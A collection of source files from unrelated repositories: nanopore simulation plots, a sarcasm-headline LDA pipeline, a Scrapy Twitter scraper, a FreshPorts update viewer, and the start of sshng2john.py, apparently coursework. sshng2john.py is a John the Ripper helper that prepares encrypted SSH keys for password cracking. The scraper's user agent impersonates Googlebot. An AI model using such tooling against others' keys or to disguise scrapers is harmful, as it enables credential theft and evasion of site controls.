koff = [fit_koff(bV=V, zreceptor=z, dx=dx, **newparams).koff for V in v]
c1, k1 = regression(mv[-4:], koff[-4:])
plt.plot(mv, koff, "v", markersize=7, label=r"Sim. ($k_d$ from Lata)",
color=color_lata)
plt.plot(vv, k1 * np.exp(c1*vv), "-", color=color_lata)
# and again with different kd
kd = 3.5e-3
koff1 = [fit_koff(bV=V, zreceptor=z, dx=dx,
tbind=1e9/kd, **newparams).koff for V in v]
c2, k2 = regression(mv[-4:], koff1[-4:])
plt.plot(mv, koff1, "o", markersize=7, label=r"Sim. ($k_d$ from Wei)",
color=color_wei)
#mfc="None", mec=color_wei)
#plt.plot(vv, k2 * np.exp(c2*vv), ":", color="#990000")
v = data[:, 0]
koff2 = data[:, 1]
plt.plot(v, koff2, "s", mfc="None", mec=color_exp,
markersize=6, mew=1.75, label="Experiment")
plt.yscale("log")
plt.ylim(ymax=.9e3)
plt.xlabel("Voltage [mV]")
plt.ylabel(r"$k_\mathrm{off}$ [1/s]")
plt.legend(frameon=False, loc="upper left")
plt.figure("koff_simple", figsize=(1.7, 1.6))
plt.plot(mv, koff1, "o", markersize=7, label=r"Simulation", color=color_wei)
plt.plot(v, koff2, "s", markersize=6, mew=1.75,
label=r"Experiment", mec=color_exp, mfc="None")
plt.yscale("log")
#plt.xlabel("Voltage [mV]")
#plt.ylabel("k off [1/s]")
plt.ylabel(ur"$\log(k_\mathrm{off})$")
plt.xlabel("Voltage")
plt.tick_params(
axis="both", # changes apply to the x-axis
which="both", # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
left=False,
right=False,
labelleft=False,
labelbottom=False)
plt.legend(frameon=False)
plt.title("Reaction kinetics")
###### read koff-bV dependence from wei data
koff0 = np.array([])
coeff = np.array([])
for i in range(1, 6):
data = np.genfromtxt("koff%d.csv" %i, delimiter=",")
voltages = data[:, 0]*1e-3
koff = data[:, 1]
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdxall_exp = coeff
cdx_exp = coeff.mean()
vdx_exp = coeff.std()
###### plt determination of bond rupture length from wei data and simulations
if determine_delta:
voltages = [-0.2, -0.25, -0.3, -0.35]
zrecs = [.90, .95, .99]
dxtest = 5.
dx = dxtest
koff0 = np.array([])
coeff = np.array([])
for z in zrecs:
for v, koff in nanopores.collect(voltages):
data = fit_koff(bV=v, zreceptor=z, dx=dx, **newparams)
koff.new = data.koff
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdxtest_sim = coeff.mean()
dx0 = cdx_exp / (cdxtest_sim / dxtest)
print "inferred dx:", dx0
dxs = [2., 3., 4., 5., 5.5, 6., 7., 8., 9.]
cdx = []
cdxstd = []
cdxall = []
for dx in dxs:
#print "dx", dx
koff0 = np.array([])
coeff = np.array([])
for z in zrecs:
for v, koff in nanopores.collect(voltages):
data = fit_koff(bV=v, zreceptor=z, dx=dx, **newparams)
koff.new = data.koff
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdx.append(coeff.mean())
cdxall.append(coeff)
cdxstd.append(coeff.std())
#print "c*dx %.3g +- %.3g" % (coeff.mean(), coeff.std())
#print "koff0 %.3g +- %.3g" % (koff0.mean(), koff0.std())
def fplot(cdx, dx):
return cdx
dx = np.array(dxs)
cdx = np.array(cdx)
cdxall = np.array(cdxall)
cdxstd = np.array(cdxstd)
dxx = np.linspace(dx[0], dx[-1], 100)
cdx_exp = np.ones(len(dxx))*cdx_exp
vdx_exp = np.ones(len(dxx))*vdx_exp
plt.figure("delta", figsize=(4, 3))
plt.plot(dxx, fplot(cdx_exp, dxx), "-", label="Wei et al.")
for i in range(5):
plt.plot(dxx, np.ones(len(dxx))*cdxall_exp[i], "-", color="C0", alpha=0.5)
#plt.plot(dxx, fplot(cdx_exp - vdx_exp, dxx), "-", color="C1")
#plt.plot(dxx, fplot(cdx_exp + vdx_exp, dxx), "-", color="C1")
#plt.fill_between(dxx, fplot(cdx_exp - vdx_exp, dxx),
# fplot(cdx_exp + vdx_exp, dxx), alpha=0.5)
#plt.plot(dx, fplot(cdx, dx), "o", label="Simulation")
plt.plot(dx, fplot(cdx, dx), "o", label="Simulations", color="C1")
for i in (0, 1, 2):
plt.plot(dx, fplot(cdxall[:, i], dx), "o", color="C1", alpha=0.5)
#plt.fill_between(dx, fplot(cdx - cdxstd, dx), fplot(cdx + cdxstd, dx), alpha=0.5)
plt.annotate(r"$\delta$=5.5nm", (5.5, cdxall[4, 0] - 1.),
xytext=(5.5 - .79, cdxall[4, 0] - 8.), color="C1",
arrowprops=dict(arrowstyle="->", color="C1"))
plt.xlabel(r"Bond rupture length $\delta$ [nm]")
plt.ylabel(r"$\alpha$ [1/V]")
plt.legend(loc="upper left", frameon=False)
import folders
nanopores.savefigs("tau_off2", folders.FIGDIR_HOWORKA + "/wei", ending=".pdf")
#nanopores.savefigs("tau_off2", folders.FIGDIR + "/wei", ending=".eps")
```
#### File: scripts/wei/tau_off_newton.py
```python
import numpy as np
from numpy import exp, expm1
from matplotlib import pyplot as plt
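# f(x) = mu^2/sigma^2 of the total dwell time when the number of bindings K is
# zero-truncated Poisson(x) and each binding duration is exponential; f1 is f'(x)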
def f(x):
return exp(x)/(2.*expm1(x)/x - 1.)
def f1(x):
y = 2.*expm1(x)/x - 1.
z = 2./x**2*(x*exp(x) - expm1(x))
return exp(x)*(1 - z/y)/y
def solve(C, n=20):
x = 2.*C # initial value
print "Newton iteration:"
for i in range(n):
dx = -(f(x) - C)/f1(x)
x = x + dx
print i, "Residual", f(x) - C, "Value", x
print
return x
def get_parameters(mu, sigma):
C = mu**2/sigma**2
ap = solve(C, 10)
lmbda = ap/(mu*(1. - exp(-ap)))
return ap, lmbda
# get experimental event data
csvfile = "tau_off_wei.csv"
data = np.genfromtxt(csvfile, delimiter=",")
bins = data[:, 0]
counts = data[:, 1]
# inspection showed that there seems to be a good,
# evenly spaced approximation to all bins except the first and last with
# spacing 0.55, i.e. of the form (beta + 0.55*np.arange(0, N)) for some beta
x = bins[:-1]
N = len(x)
# minimize norm(x - (beta + 0.55*np.arange(0, N)) w.r.t. beta
beta = x.mean() - 0.55*(N-1)/2.
# turns out beta is close to 0.25, which gives nice numbers,
# so we will just take that
bins = 0.25 + 0.55*np.arange(0, N)
bins = [0.] + list(bins) + [20.]
N = N+1
# the counts should be integer-values, so
counts = np.round(counts).astype(int)
# now let's reproduce the plot
# first create fake data samples that reproduce the histogram
fake = np.array([])
frac = 1.
while frac > 0.5: #int(counts[0]*frac) > 1:
frac /= 2.
a, b = bins[1]*frac, bins[1]*2*frac
sample = a*(b/a)**(np.random.rand(int(counts[0]*frac)))
fake = np.append(fake, sample)
print "frac", frac
for i in range(1, N):
a, b = bins[i], bins[i+1]
sample = a*(b/a)**(np.random.rand(counts[i]))
fake = np.append(fake, sample)
# compute mu, variance, solve for parameters
mu = np.mean(fake)
sigma = np.std(fake)
ap, lmbda = get_parameters(mu, sigma)
print "mu, sigma =", mu, sigma
print "mu^2/sigma^2 =", mu**2/sigma**2
print "ap, lambda =", ap, lmbda
print
print "binding probability: %.3f (for a=2.2)" % (ap/2.2,)
print "mean binding duration: %.3f s" % (1./lmbda,)
#
#
#X = linspace(0., 10., 100)
#plt.plot(X, f(X, 0.))
#plt.plot(X, X/2.)
#plt.show()
``` |
{
"source": "jhwong18/Sarcasm-Detector-for-News-Headline-",
"score": 3
} |
#### File: src/data_processing/data_processing_helpers.py
```python
import os
import numpy as np
import pandas as pd
from datetime import datetime as dt
import logging
import string
import re
from data_processing.helpers import Config
import data_processing.helpers as helpers
logger = logging.getLogger('sarcasm_detector')
class DataLoad:
"""Load the JSON dataset, convert into pandas dataframe and check for null values in each column"""
def __init__(self, data_path="data/Sarcasm_Headlines_Dataset.json"):
self.data_path = data_path
self.df = None
def load_jsondata(self):
"""Load JSON dataset and convert into pandas dataframe"""
self.df = pd.read_json(self.data_path, lines=True)
logger.info('{} dataset loaded'.format(self.data_path))
def filter_columns(self):
"""Remove columns in dataset"""
self.df = self.df[['headline', 'is_sarcastic']]
def check_null_for_sarcasm(self):
"""Check for null values in target variable: is_sarcastic"""
logger.info('{} rows with valid target values'.format(self.df.is_sarcastic.notnull().sum()))
logger.info('{} rows with empty target values'.format(self.df.is_sarcastic.isnull().sum()))
def check_null_for_headlines(self):
"""Check for null values in feature variable: headline"""
logger.info('{} rows with valid headlines'.format(self.df.headline.notnull().sum()))
logger.info('{} rows with empty headlines'.format(self.df.headline.isnull().sum()))
def run(self):
"""Top-level method in class for running all other methods in the class"""
self.load_jsondata()
self.filter_columns()
self.check_null_for_headlines()
self.check_null_for_sarcasm()
return self.df
class DataProcessing:
"""Perform preprocessing of data in order to perform the subsequent analysis and modelling
Preprocessing steps:
- Ensure all words in a headline is in lowercase
- Remove punctuation in headlines
- Create a new column to calculate the number of words in a headline
- Create a new column to calculate the number of unique words in a headline
- Create a new column to determine whether a headline contains numbers/digits
"""
def __init__(self):
self.df = DataLoad().run()
def convert_headline_lowercase(self):
"""Ensure all words in a headline is in lowercase"""
self.df['headline'] = self.df['headline'].apply(lambda x: x.lower())
def remove_headline_punctuation(self):
"""Remove punctuation in headlines"""
self.df['headline'] = self.df['headline'].apply(lambda x: ' '.join(word.strip(string.punctuation)
for word in x.split()))
def create_headline_count(self):
"""Create a new column to calculate the number of words in a headline """
self.df['headline_count'] = self.df['headline'].apply(lambda x: len(list(x.split())))
def create_headline_unique_count(self):
"""Create a new column to calculate the number of unique words in a headline"""
self.df['headline_unique_word_count'] = self.df['headline'].apply(lambda x: len(set(x.split())))
def create_headline_digit(self):
"""Create a new column to determine whether a headline contains numbers/digits"""
self.df['headline_has_digits'] = self.df['headline'].apply(lambda x: bool(re.search(r'\d', x)))
def run(self):
"""Top-level method in class for running all other methods in the class"""
logger.info('Starting data processing...')
self.convert_headline_lowercase()
self.remove_headline_punctuation()
self.create_headline_count()
self.create_headline_unique_count()
self.create_headline_digit()
logger.info('Data processing completed')
return self.df
```
#### File: src/models/lda.py
```python
import pandas as pd
import re
import numpy as np
import nltk
import spacy
from spacy.lang.en import English
import en_core_web_sm
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
import gensim
from gensim import corpora
import pickle
from tqdm import tqdm
import pyLDAvis.gensim
import logging
import warnings
from data_processing.data_processing_helpers import DataProcessing
import data_processing.helpers as helpers
from data_processing.helpers import Config
warnings.filterwarnings("ignore", category=DeprecationWarning)
logger = logging.getLogger('sarcasm_detector')
class LDAPreProcessing:
"""Perform preprocessing of data in order to perform LDA
Preprocessing steps:
- Tokenize the headlines
- Ensure all words in a headline are lowercase
- Remove stopwords and tokens of 4 characters or fewer
- Lemmatize the headlines
"""
try:
nltk.data.find('corpora/stopwords')
except LookupError:
nltk.download('stopwords')
try:
nltk.data.find('corpora/wordnet')
except LookupError:
nltk.download('wordnet')
def __init__(self):
self.df = DataProcessing().run()
self.text_data = []
self.dictionary = {}
self.corpus = []
en_core_web_sm.load()
self.en_stop = set(nltk.corpus.stopwords.words('english'))
self.parser = English()
def tokenize(self, text):
"""this function is to tokenize the headline into a list of individual words"""
lda_tokens = []
# need to use parser for python to treat the list as words
tokens = self.parser(text)
for token in tokens:
# to ignore any whitespaces in the headline, so that token list does not contain whitespaces
if token.orth_.isspace():
continue
elif token.like_url:
lda_tokens.append('URL')
elif token.orth_.startswith('@'):
lda_tokens.append('SCREEN_NAME')
else:
lda_tokens.append(token.lower_) # tokens (headlines) are already in lowercase
return lda_tokens
def get_lemma(self, word):
"""this function is to lemmatize the words in a headline into its root form"""
# converts the word into root form from wordnet
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def prepare_text_for_lda(self, text):
"""To tokenize, remove headlines with only a few words (<4 words), lemmatize words in headlines"""
tokens = self.tokenize(text) # parse and tokenize the headline into a list of words
tokens = [token for token in tokens if len(token) > 4] # remove headlines with only length of 4 words or less
tokens = [token for token in tokens if token not in self.en_stop] # remove stopwords in the headline
tokens = [self.get_lemma(token) for token in tokens] # lemmatize the words in the headline
return tokens
def run(self):
"""Top-level method in class for preprocessing the data for LDA model"""
logger.info('Starting data processing for LDA...')
logger.info('Starting to tokenize dataset...')
for i in tqdm(range(0, len(self.df.headline))):
headline = self.df.headline[i]
tokens = self.prepare_text_for_lda(headline)
self.text_data.append(tokens)
logger.info('Tokens created from dataset')
logger.info('Starting to convert headlines into corpus and dictionary...')
# Convert all headlines into a corpus of words, with each word as a token
self.dictionary = corpora.Dictionary(self.text_data)
# Convert each headline (a list of words) into the bag-of-words format. (Word ID, Count of word)
self.corpus = [self.dictionary.doc2bow(text) for text in self.text_data]
logger.info('Corpus and dictionary created from dataset')
pickle.dump(self.corpus, open('result/visualization/corpus.pkl', 'wb'))
logger.info('Corpus saved as corpus.pkl in visualization folder')
# takes a while to run the dictionary and corpus
self.dictionary.save('result/visualization/dictionary.gensim')
logger.info('Dictionary saved as dictionary.gensim in visualization folder')
return self.dictionary, self.corpus
class LDA:
"""Perform LDA on the dataset and obtain the results in terms of number of topics and distribution of words
in each topic
Results:
- Topics and distribution of words in each topic as a linear combination of coefficients (in results/logs)
- Interactive visualization for each topic and distribution of words in each topic (in results/visualization)
"""
def __init__(self, config_path='config.yaml'):
self.config = Config(config_path)
self.dictionary, self.corpus = LDAPreProcessing().run()
self.NUM_TOPICS = self.config.NUM_TOPICS
def model(self):
"""this function is to tokenize the headline into a list of individual words"""
ldamodel = gensim.models.ldamodel.LdaModel(self.corpus, num_topics=self.NUM_TOPICS,
id2word=self.dictionary, passes=15)
ldamodel.save('result/visualization/{}.gensim'.format(str(self.NUM_TOPICS) + '_Topic'))
logger.info('LDA Model saved as visualization/{}.gensim in visualization folder'.format(
str(self.NUM_TOPICS) + '_Topic'))
logger.info('-----------------')
logger.info('Results for LDA model with {} (top 5 words in each topic):'.format(str(self.NUM_TOPICS)))
logger.info('-----------------')
logger.info(ldamodel.print_topics(num_words=5))
lda_display = pyLDAvis.gensim.prepare(ldamodel, self.corpus, self.dictionary, sort_topics=False)
pyLDAvis.display(lda_display)
pyLDAvis.save_html(lda_display, 'result/visualization/lda_{}.html'.format(str(self.NUM_TOPICS) + '_Topic'))
logger.info(
'LDA Model Visualization saved as visualization/lda_{}.html in visualization folder'.format(
str(self.NUM_TOPICS) + '_Topic'))
def run(self):
"""Top-level method in class for running the LDA to generate the HTML visualizations"""
self.model()
``` |
{
"source": "jhwong18/Twitter-Web-Scrapping-with-Scrapy",
"score": 3
} |
#### File: Twitter-Web-Scrapping-with-Scrapy/TwitterCrawler/pipelines.py
```python
import psycopg2
class TwittercrawlerPipeline(object):
def open_spider(self, spider):
hostname = 'localhost'
username = 'postgres'
password = '*****' # your password
database = 'twitter_tweets'
self.connection = psycopg2.connect(host=hostname, user=username, password=password, dbname=database)
self.cur = self.connection.cursor()
def close_spider(self, spider):
self.cur.close()
self.connection.close()
def process_item(self, item, spider):
self.cur.execute("INSERT INTO profile_tweets(username, full_name, twitter_url, tweet_text, tweet_time, number_of_likes, no_of_retweets, no_of_replies, mentions, no_of_mentions, hashtags, no_of_hashtags, call_to_action, image_url) "
"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)", (item['username'], item['full_name'], item['twitter_url'],
item['tweet_text'], item['tweet_time'], item['number_of_likes'],
item['no_of_retweets'], item['no_of_replies'], item['mentions'],
item['no_of_mentions'], item['hashtags'], item['no_of_hashtags'],
item['call_to_action'], item['image_url']))
self.connection.commit()
return item  # hand the item on to any downstream pipelines
```
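As a side note (a sketch, not taken from this repository), a Scrapy item pipeline like the one above only runs if it is enabled in the project's `settings.py`; the dotted path follows from the package and class names used here, while the priority value is arbitrary:
```python
# settings.py (sketch)
ITEM_PIPELINES = {
    'TwitterCrawler.pipelines.TwittercrawlerPipeline': 300,
}
```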
#### File: TwitterCrawler/spiders/profile.py
```python
import scrapy
import ipdb
import re
from dateutil import parser
import sys
from scrapy.crawler import CrawlerProcess
from utils import get_links, get_hashtags, get_mentions
import logging
import pandas as pd
import os
from TwitterCrawler.items import TwitterprofilecrawlerItem
class ProfileSpider(scrapy.Spider):
name = 'TwitterCrawler'
allowed_domains = ["twitter.com"]
COUNT_MAX = 500 # maximum number of tweets scraped
    # Custom settings for the user agent, request concurrency, log level and the
    # page-count limit; override here if needed.
custom_settings = {
'USER_AGENT': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; '
'+http://www.google.com/bot.html) Safari/537.36',
'CONCURRENT_REQUESTS': 5, 'DOWNLOAD_DELAY': 0, 'LOG_LEVEL': 'INFO', 'CLOSESPIDER_PAGECOUNT': COUNT_MAX}
def __init__(self, filename='', is_csv=False):
if not filename:
sys.exit('Please provide the input filename')
self.filename = filename
# the crawler will execute start_requests function at first.
def start_requests(self):
with open(self.filename, 'r') as f:
profiles = f.read().splitlines()
if len(profiles) == 0:
                sys.exit('Empty file detected. Please provide profiles separated by newlines.')
else:
logging.info(f'{len(profiles)} profiles found')
for profile in profiles:
if profile:
search_url = "https://mobile.twitter.com/" + profile.lower()
yield scrapy.Request(search_url, callback=self.find_tweets, dont_filter=True)
def find_tweets(self, response):
tweets = response.xpath('//table[@class="tweet "]/@href').getall()
logging.info(f'{len(tweets)} tweets found')
for tweet_id in tweets:
            tweet_id = re.findall(r"\d+", tweet_id)[-1]
tweet_url = 'https://twitter.com/anyuser/status/' + \
str(tweet_id)
yield scrapy.Request(tweet_url, callback=self.parse_tweet)
# finding and visiting next page
        next_page = response.xpath(
            '//*[@class="w-button-more"]/a/@href').get(default='')
        if next_page != '':
            logging.info(f'Next page found: {next_page}')
            next_page = 'https://mobile.twitter.com' + next_page
            yield scrapy.Request(next_page, callback=self.find_tweets)
def parse_tweet(self, response):
logging.info('Processing --> ' + response.url)
username = response.xpath(
'//*[@class="permalink-inner permalink-tweet-container"]//*[@class="username u-dir '
'u-textTruncate"]/b/text()').get(
default='')
full_name = response.xpath(
'//*[@class="permalink-inner permalink-tweet-container"]//*[@class="FullNameGroup"]/strong/text()').get(
default='')
try:
tweet_text = response.xpath('//title/text()').get(default='').split(':')[1].strip()
        except IndexError:
tweet_text = ' '.join(response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*['
'@class="js-tweet-text-container"]/p//text()').getall()).strip()
image_list = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*['
'@class="AdaptiveMediaOuterContainer"]//img/@src').getall()
date_time = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="client-and-actions"]/span[@class="metadata"]/span/text()').get(
default='')
date_time = parser.parse(date_time.replace('-', '')).strftime('%Y-%m-%d %H:%M:%S')
retweets = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="js-tweet-stats-container tweet-stats-container"]//*['
'@class="js-stat-count js-stat-retweets stat-count"]/a/strong/text()').get(
default='')
likes = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="js-tweet-stats-container tweet-stats-container"]//*['
'@class="js-stat-count js-stat-favorites stat-count"]/a/strong/text()').get(
default='')
replies = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[contains(@id,'
'"profile-tweet-action-reply-count")]/parent::span/@data-tweet-stat-count').get(
default='')
mentions = get_mentions(tweet_text)
hashtags = get_hashtags(tweet_text)
cta = get_links(tweet_text)
crawlerItem = TwitterprofilecrawlerItem(username=username.lower(),
full_name=full_name,
twitter_url=response.url,
tweet_text=tweet_text,
tweet_time=str(date_time),
number_of_likes=str(likes),
no_of_retweets=str(retweets),
no_of_replies=str(replies),
mentions=' | '.join(mentions),
no_of_mentions=str(len(mentions)),
hashtags=' | '.join(hashtags),
no_of_hashtags=str(len(hashtags)),
call_to_action=' | '.join(cta),
image_url=' | '.join(image_list))
yield crawlerItem
```
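A sketch of launching the spider programmatically with Scrapy's `CrawlerProcess` (already imported by the spider module); `profiles.txt`, one Twitter handle per line, is an assumed input file, and the pipeline priority value is arbitrary.
```python
from scrapy.crawler import CrawlerProcess

from TwitterCrawler.spiders.profile import ProfileSpider

process = CrawlerProcess(settings={
    # enable the PostgreSQL pipeline defined in TwitterCrawler/pipelines.py
    "ITEM_PIPELINES": {"TwitterCrawler.pipelines.TwittercrawlerPipeline": 300},
})
process.crawl(ProfileSpider, filename="profiles.txt")
process.start()  # blocks until the crawl finishes
```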
#### File: jhwong18/Twitter-Web-Scrapping-with-Scrapy/utils.py
```python
import re
def find_emails(text):
"""
It will parse the given string and return a list of emails if found
Example:
>>find_emails('hello\n find me here\n<EMAIL>')
['<EMAIL>']
:param text: string
:return: list
"""
return re.findall(r"([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)", text)
def get_mentions(text):
"""
It will return mentions from the text i.e @someone
:param text: string
:return: list
example
>>> get_mentions('Hi @hero, How are you? I hope @hero2 is fine. BTW say hi to @heroine for me')
['hero','hero2','heroine']
"""
result = re.findall("(^|[^@\w])@(\w{1,15})", text)
if len(result) != 0:
result = [i[1] for i in result]
return result
def get_hashtags(text):
"""
It will return hashtags from the text i.e #something
:param text: string
:return: list
example
>>> get_hashtags('my first code #programmer #python #awesome #grepsr')
['programmer','python','awesome','grepsr']
"""
result = re.findall("(^|[^@\w])#(\w{1,15})", text)
if len(result) != 0:
result = [i[1] for i in result]
return result
def get_links(text):
"""
It will return website links from the text
:param text: string
:return: list
example
>>> message = 'http://twitter.com Project URL: https://app.grepsr.com/app/project/message/70454'
>>> get_links(message)
['http://twitter.com', 'https://app.grepsr.com/app/project/message/70454']
"""
result = re.findall(r"(?P<url>https?://[^\s]+)", text)
return result
``` |
{
"source": "jhx0/portupdate",
"score": 3
} |
#### File: jhx0/portupdate/portupdate.py
```python
import re
import emoji
import requests
import argparse
from bs4 import BeautifulSoup
from colorama import init, Fore, Style
# the URL should not be changed
url = 'https://www.freshports.org/'
# max number of port updates to show
# tune this to your needs
max_updates = 10
basicFlag = False
def showUpdates():
init()
data = requests.get(url)
html = BeautifulSoup(data.text, 'html.parser')
count = 0
for item in html.find_all('span', { 'class': 'element-details' }):
if count >= max_updates:
break
name, version = item.text.split(" ")
if basicFlag:
print("{: <50}{}".format(name, version))
else:
print("{} {: <50}{}".format(emoji.emojize(':package:'),
Fore.GREEN + Style.BRIGHT + name,
Fore.RED + Style.BRIGHT + version))
count += 1
def main():
showUpdates()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--basic", help="simple output", action="store_true")
args = parser.parse_args()
basicFlag = args.basic
main()
``` |
{
"source": "jhxie/cmput333",
"score": 2
} |
#### File: a1sliding/run/sshng2john.py
```python
import traceback
import binascii
import base64
import sys
try:
from hashlib import md5 as MD5
except ImportError:
from md5 import md5 as MD5
limited = False
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
else:
from StringIO import StringIO
class Object(object):
pass
try:
from Crypto.Cipher import DES3, AES
except ImportError:
AES = Object()
AES.MODE_CBC = ""
DES3 = Object()
DES3.MODE_CBC = ""
limited = True
class BERException (Exception):
pass
class BER(object):
"""
Robey's tiny little attempt at a BER decoder.
"""
def __init__(self, content=''):
self.content = content
self.idx = 0
def __str__(self):
return self.content
def __repr__(self):
return 'BER(\'' + repr(self.content) + '\')'
def decode(self):
return self.decode_next()
def decode_next(self):
if self.idx >= len(self.content):
return None
ident = ord(self.content[self.idx])
self.idx += 1
if (ident & 31) == 31:
# identifier > 30
ident = 0
while self.idx < len(self.content):
t = ord(self.content[self.idx])
self.idx += 1
ident = (ident << 7) | (t & 0x7f)
if not (t & 0x80):
break
if self.idx >= len(self.content):
return None
# now fetch length
size = ord(self.content[self.idx])
self.idx += 1
if size & 0x80:
            # more complicated...
# FIXME: theoretically should handle indefinite-length (0x80)
t = size & 0x7f
if self.idx + t > len(self.content):
return None
size = inflate_long(self.content[self.idx: self.idx + t], True)
self.idx += t
if self.idx + size > len(self.content):
# can't fit
return None
data = self.content[self.idx: self.idx + size]
self.idx += size
# now switch on id
if ident == 0x30:
# sequence
return self.decode_sequence(data)
elif ident == 2:
# int
return inflate_long(data)
else:
# 1: boolean (00 false, otherwise true)
raise BERException('Unknown ber encoding type %d (robey is lazy)' % ident)
def decode_sequence(data):
out = []
b = BER(data)
while True:
x = b.decode_next()
if x is None:
break
out.append(x)
return out
decode_sequence = staticmethod(decode_sequence)
class SSHException (Exception):
"""
Exception raised by failures in SSH2 protocol negotiation or logic errors.
"""
pass
class AuthenticationException (SSHException):
"""
Exception raised when authentication failed for some reason. It may be
possible to retry with different credentials. (Other classes specify more
specific reasons.)
@since: 1.6
"""
pass
class PasswordRequiredException (AuthenticationException):
"""
Exception raised when a password is needed to unlock a private key file.
"""
pass
class BadAuthenticationType (AuthenticationException):
"""
Exception raised when an authentication type (like password) is used, but
the server isn't allowing that type. (It may only allow public-key, for
example.)
@ivar allowed_types: list of allowed authentication types provided by the
server (possible values are: C{"none"}, C{"password"}, and
C{"publickey"}).
@type allowed_types: list
@since: 1.1
"""
allowed_types = []
def __init__(self, explanation, types):
AuthenticationException.__init__(self, explanation)
self.allowed_types = types
def __str__(self):
return SSHException.__str__(self) + ' (allowed_types=%r)' % self.allowed_types
class PartialAuthentication (AuthenticationException):
"""
An internal exception thrown in the case of partial authentication.
"""
allowed_types = []
def __init__(self, types):
AuthenticationException.__init__(self, 'partial authentication')
self.allowed_types = types
class ChannelException (SSHException):
"""
Exception raised when an attempt to open a new L{Channel} fails.
@ivar code: the error code returned by the server
@type code: int
@since: 1.6
"""
def __init__(self, code, text):
SSHException.__init__(self, text)
self.code = code
class BadHostKeyException (SSHException):
"""
The host key given by the SSH server did not match what we were expecting.
@ivar hostname: the hostname of the SSH server
@type hostname: str
@ivar key: the host key presented by the server
@type key: L{PKey}
@ivar expected_key: the host key expected
@type expected_key: L{PKey}
@since: 1.6
"""
def __init__(self, hostname, got_key, expected_key):
SSHException.__init__(self, 'Host key for server %s does not match!' % hostname)
self.hostname = hostname
self.key = got_key
self.expected_key = expected_key
from binascii import hexlify, unhexlify
import struct
def inflate_long(s, always_positive=False):
"""turns a normalized byte string into a long-int
(adapted from Crypto.Util.number)"""
out = 0
negative = 0
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
negative = 1
if len(s) % 4:
filler = '\x00'
if negative:
filler = '\xff'
s = filler * (4 - len(s) % 4) + s
for i in range(0, len(s), 4):
out = (out << 32) + struct.unpack('>I', s[i:i + 4])[0]
if negative:
out -= (1 << (8 * len(s)))
return out
def deflate_long(n, add_sign_padding=True):
"turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"
# after much testing, this algorithm was deemed to be the fastest
s = ''
    n = int(n)  # int() covers both Python 2 longs and Python 3 ints
while (n != 0) and (n != -1):
s = struct.pack('>I', n & 0xffffffff) + s
n = n >> 32
# strip off leading zeros, FFs
for i in enumerate(s):
if (n == 0) and (i[1] != '\000'):
break
if (n == -1) and (i[1] != '\xff'):
break
else:
# degenerate case, n was either 0 or -1
i = (0,)
if n == 0:
s = '\000'
else:
s = '\xff'
s = s[i[0]:]
if add_sign_padding:
if (n == 0) and (ord(s[0]) >= 0x80):
s = '\x00' + s
if (n == -1) and (ord(s[0]) < 0x80):
s = '\xff' + s
return s
def format_binary_weird(data):
out = ''
for i in enumerate(data):
out += '%02X' % ord(i[1])
if i[0] % 2:
out += ' '
if i[0] % 16 == 15:
out += '\n'
return out
def format_binary(data, prefix=''):
x = 0
out = []
while len(data) > x + 16:
out.append(format_binary_line(data[x:x + 16]))
x += 16
if x < len(data):
out.append(format_binary_line(data[x:]))
return [prefix + x for x in out]
def format_binary_line(data):
left = ' '.join(['%02X' % ord(c) for c in data])
right = ''.join([('.%c..' % c)[(ord(c) + 63) // 95] for c in data])
return '%-50s %s' % (left, right)
def hexify(s):
return hexlify(s).upper()
def unhexify(s):
return unhexlify(s)
def safe_string(s):
out = ''
for c in s:
if (ord(c) >= 32) and (ord(c) <= 127):
out += c
else:
out += '%%%02X' % ord(c)
return out
# ''.join([['%%%02X' % ord(c), c][(ord(c) >= 32) and (ord(c) <= 127)] for c in s])
def bit_length(n):
norm = deflate_long(n, 0)
hbyte = ord(norm[0])
if hbyte == 0:
return 1
bitlen = len(norm) * 8
while not (hbyte & 0x80):
hbyte <<= 1
bitlen -= 1
return bitlen
def tb_strings():
return ''.join(traceback.format_exception(*sys.exc_info())).split('\n')
def generate_key_bytes(hashclass, salt, key, nbytes):
"""
Given a password, passphrase, or other human-source key, scramble it
through a secure hash into some keyworthy bytes. This specific algorithm
is used for encrypting/decrypting private key files.
@param hashclass: class from L{Crypto.Hash} that can be used as a secure
hashing function (like C{MD5} or C{SHA}).
@type hashclass: L{Crypto.Hash}
@param salt: data to salt the hash with.
@type salt: string
@param key: human-entered password or passphrase.
@type key: string
@param nbytes: number of bytes to generate.
@type nbytes: int
@return: key data
@rtype: string
"""
keydata = ''
digest = ''
if len(salt) > 8:
salt = salt[:8]
while nbytes > 0:
hash_obj = hashclass()
if len(digest) > 0:
hash_obj.update(digest)
hash_obj.update(key)
hash_obj.update(salt)
digest = hash_obj.digest()
size = min(nbytes, len(digest))
keydata += digest[:size]
nbytes -= size
return keydata
"""
Common API for all public keys.
"""
class PKey (object):
"""
Base class for public keys.
"""
# known encryption types for private key files:
_CIPHER_TABLE = {
